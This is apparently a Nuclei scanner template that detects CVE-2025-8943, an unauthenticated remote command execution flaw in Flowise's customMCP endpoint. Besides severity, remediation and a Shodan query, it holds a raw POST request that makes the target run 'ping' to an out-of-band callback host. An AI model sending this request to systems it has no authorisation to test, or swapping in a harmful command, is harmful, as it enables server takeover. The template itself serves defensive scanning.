id: CVE-2025-8943 info: name: Flowise < 3.0.1 - Remote Command Execution author: zezezez severity: critical description: | The Custom MCPs feature is designed to execute OS commands, for instance, using tools like `npx` to spin up local MCP Servers. However, Flowise's inherent authentication and authorization model is minimal and lacks role-based access controls (RBAC). Furthermore, in Flowise versions before 3.0.1 the default installation operates without authentication unless explicitly configured. This combination allows unauthenticated network attackers to execute unsandboxed OS commands. impact: | Successful exploitation allows attackers to execute arbitrary OS commands on the target server, potentially leading to complete system compromise, data theft, and lateral movement within the network. remediation: | Update Flowise to the latest version that addresses this vulnerability. Implement proper input validation and sanitization for the customMCP endpoint parameters. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-8943 - https://www.cve.org/CVERecord?id=CVE-2025-8943 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-8943 epss-score: 0.7231 epss-percentile: 0.99375 cwe-id: CWE-78 cpe: cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: flowiseai product: flowise shodan-query: http.title:"Flowise" tags: cve,cve2025,rce,flowise,oast,fictional,vkev,ai http: - raw: - | POST /api/v1/node-load-method/customMCP HTTP/1.1 Host: {{Hostname}} Content-Type: application/json x-request-from: internal { "inputs": { "mcpServerConfig": { "command": "ping", "args": [ "{{interactsh-url}}", "-c", "4" ] } }, "loadMethod": "listActions" } matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains_all(body, "No Available Actions", "label\":")' - 'contains_any(content_type, "application/json")' - 'status_code == 200' condition: and # digest: 490a00463044022009f09599c4a69e11359dd297289601358341332b428375160375669b8f0adc9f0220193f9cc255cf3a9160e7a68e19aabdb62260802c39e4dbb7617e8d53465a52fe:922c64590222798bb761d5b6d8e72950